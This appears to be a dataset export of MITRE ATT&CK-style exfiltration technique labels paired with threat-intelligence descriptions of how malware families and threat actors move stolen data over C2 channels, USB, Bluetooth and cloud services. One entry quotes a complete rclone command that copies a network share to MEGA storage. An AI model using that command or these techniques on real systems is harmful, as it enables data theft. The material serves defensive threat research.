prompt
stringclasses
508 values
procedure
stringlengths
20
478
Exfiltration Over C2 Channel
Lokibot has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.
Exfiltration Over C2 Channel
It has used malware that exfiltrates stolen data to its C2 server.
Exfiltration Over C2 Channel
It's collected data is exfiltrated over the same channel used for C2.
Exfiltration Over C2 Channel
MacMa exfiltrates data from a supplied path over its C2 channel.
Exfiltration Over C2 Channel
Mafalda can send network system data and files to its C2 server.
Exfiltration Over C2 Channel
MarkiRAT can exfiltrate locally stored data via its C2.
Exfiltration Over C2 Channel
MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2.
Exfiltration Over C2 Channel
metaMain can upload collected files and data to its C2 server.
Exfiltration Over C2 Channel
Metamorfo can send the data it collects to the C2 server.
Exfiltration Over C2 Channel
Mis-Type has transmitted collected files and data to its C2 server.
Exfiltration Over C2 Channel
Misdat has uploaded files and data to its C2 servers.
Exfiltration Over C2 Channel
MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications.
Exfiltration Over C2 Channel
Mongall can upload files and information from a compromised host to its C2 server.
Exfiltration Over C2 Channel
It has used C2 infrastructure to receive exfiltrated data.
Exfiltration Over C2 Channel
NETEAGLE is capable of reading files over the C2 channel.
Exfiltration Over C2 Channel
NightClub can use SMTP and DNS for file exfiltration and C2.
Exfiltration Over C2 Channel
njRAT has used HTTP to receive stolen information from the infected machine.
Exfiltration Over C2 Channel
Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.
Exfiltration Over C2 Channel
Data exfiltration is done by Okrum using the already opened channel with the C2 server.
Exfiltration Over C2 Channel
OopsIE can upload files from the victim's machine to its C2 server.
Exfiltration Over C2 Channel
During Operation Dream Job, It exfiltrated data from a compromised host to actor-controlled C2 servers.
Exfiltration Over C2 Channel
During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.
Exfiltration Over C2 Channel
During Operation Wocao, threat actors used the XServer backdoor to exfiltrate data.
Exfiltration Over C2 Channel
OutSteel can upload files from a compromised host over its C2 channel.
Exfiltration Over C2 Channel
PcShare can upload files and information from a compromised host to its C2 servers.
Exfiltration Over C2 Channel
Penquin can execute the command code do_upload to send files to C2.
Exfiltration Over C2 Channel
PingPull has the ability to exfiltrate stolen victim data through its C2 channel.
Exfiltration Over C2 Channel
PoetRAT has exfiltrated data over the C2 channel.
Exfiltration Over C2 Channel
PowerShower has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.
Exfiltration Over C2 Channel
Proxysvc performs data exfiltration over the control server channel using a custom protocol.
Exfiltration Over C2 Channel
Psylo exfiltrates data to its C2 server over the same protocol as C2 communications.
Exfiltration Over C2 Channel
Pteranodon exfiltrates screenshot files to its C2 server.
Exfiltration Over C2 Channel
Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.
Exfiltration Over C2 Channel
QakBot can send stolen information to C2 nodes including passwords, accounts, and emails.
Exfiltration Over C2 Channel
RDAT can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.
Exfiltration Over C2 Channel
Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.
Exfiltration Over C2 Channel
REvil can exfiltrate host and malware information to C2 servers.
Exfiltration Over C2 Channel
Rising Sun can send data gathered from the infected machine via HTTP POST request to the C2.
Exfiltration Over C2 Channel
ROKRAT can send collected files back over same C2 channel.
Exfiltration Over C2 Channel
RotaJakiro sends device and other collected data back to the C2 using the established C2 channels over TCP.
Exfiltration Over C2 Channel
S-Type has uploaded data and files from a compromised host to its C2 servers.
Exfiltration Over C2 Channel
It has sent system information to its C2 server using HTTP.
Exfiltration Over C2 Channel
SDBbot has sent collected data from a compromised host to its C2 servers.
Exfiltration Over C2 Channel
Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.
Exfiltration Over C2 Channel
SharpDisco can load a plugin to exfiltrate stolen files to SMB shares also used in C2.
Exfiltration Over C2 Channel
ShimRatReporter sent generated reports to the C2 via HTTP POST requests.
Exfiltration Over C2 Channel
SideTwist has exfiltrated data over its C2 channel.
Exfiltration Over C2 Channel
SILENTTRINITY can transfer files from an infected host to the C2 server.
Exfiltration Over C2 Channel
Sliver can exfiltrate files from the victim using the download command.
Exfiltration Over C2 Channel
SLOTHFULMEDIA has sent system information to a C2 server via HTTP and HTTPS POST requests.
Exfiltration Over C2 Channel
SMOKEDHAM has exfiltrated data to its C2 server.
Exfiltration Over C2 Channel
SombRAT has uploaded collected data and files from a compromised host to its C2 server.
Exfiltration Over C2 Channel
Spark has exfiltrated data over the C2 channel.
Exfiltration Over C2 Channel
Squirrelwaffle has exfiltrated victim data using HTTP POST requests to its C2 servers.
Exfiltration Over C2 Channel
STARWHALE can exfiltrate collected data to its C2 servers.
Exfiltration Over C2 Channel
After data is collected by It malware, it is exfiltrated over the existing C2 channel.
Exfiltration Over C2 Channel
StrifeWater can send data and files from a compromised host to its C2 server.
Exfiltration Over C2 Channel
StrongPity can exfiltrate collected documents through C2 channels.
Exfiltration Over C2 Channel
Stuxnet sends compromised victim information via HTTP.
Exfiltration Over C2 Channel
SUGARDUMP has sent stolen credentials and other data to its C2 server.
Exfiltration Over C2 Channel
SVCReady can send collected data in JSON format to its C2 server.
Exfiltration Over C2 Channel
SysUpdate has exfiltrated data over its C2 channel.
Exfiltration Over C2 Channel
TajMahal has the ability to send collected files over its C2.
Exfiltration Over C2 Channel
ThiefQuest exfiltrates targeted file extensions in the /Users/ folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.
Exfiltration Over C2 Channel
Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.
Exfiltration Over C2 Channel
Torisma can send victim data to an actor-controlled C2 server.
Exfiltration Over C2 Channel
TrickBot can send information about the compromised host and upload data to a hardcoded C2 server.
Exfiltration Over C2 Channel
Ursnif has used HTTP POSTs to exfil gathered information.
Exfiltration Over C2 Channel
Valak has the ability to exfiltrate data over the C2 channel.
Exfiltration Over C2 Channel
WarzoneRAT can send collected victim data to its C2 server.
Exfiltration Over C2 Channel
It has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.
Exfiltration Over C2 Channel
Woody RAT can exfiltrate files from an infected machine to its C2 server.
Exfiltration Over C2 Channel
XCSSET exfiltrates data stolen from a system over its C2 channel.
Exfiltration Over C2 Channel
Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests.
Exfiltration Over C2 Channel
ItM has exfiltrated files via the Dropbox API C2.
Exfiltration Over C2 Channel
ZLib has sent data and files from a compromised host to its C2 servers.
Exfiltration Over Other Network Medium:Exfiltration Over Bluetooth
Flame has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.
Exfiltration Over Physical Medium:Exfiltration over USB
Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.
Exfiltration Over Physical Medium:Exfiltration over USB
It has a feature to copy files from every drive onto a removable drive in a hidden folder.
Exfiltration Over Physical Medium:Exfiltration over USB
It has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.
Exfiltration Over Physical Medium:Exfiltration over USB
Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.
Exfiltration Over Physical Medium:Exfiltration over USB
SPACESHIP copies staged data to removable drives when they are inserted into the system.
Exfiltration Over Physical Medium:Exfiltration over USB
It has exfiltrated data using USB storage devices.
Exfiltration Over Physical Medium:Exfiltration over USB
USBStealer exfiltrates collected files via removable media from air-gapped victims.
Exfiltration Over Web Service
AppleSeed has exfiltrated files using web services.
Exfiltration Over Web Service
It can exfiltrate data over Google Drive.
Exfiltration Over Web Service
During C0017, It used Cloudflare services for data exfiltration.
Exfiltration Over Web Service
DropBook has used legitimate web services to exfiltrate data.
Exfiltration Over Web Service
It has used the Telegram API sendMessage to relay data on compromised devices.
Exfiltration Over Web Service
ngrok has been used by threat actors to configure servers for data exfiltration.
Exfiltration Over Web Service:Exfiltration to Code Repository
Empire can use GitHub for data exfiltration.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
BoomBox can upload data to dedicated per-victim folders in Dropbox.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
It has exfiltrated stolen data to OneDrive accounts.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
Clambling can send files from a victim's machine to Dropbox.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
It has exfiltrated victim data to cloud storage service accounts.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
CreepyDrive can use cloud services including OneDrive for data exfiltration.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
Crutch has exfiltrated stolen data to Dropbox.
Exfiltration Over Web Service:Exfiltration to Cloud Storage
It has used the megacmd tool to upload stolen files from a victim network to MEGA.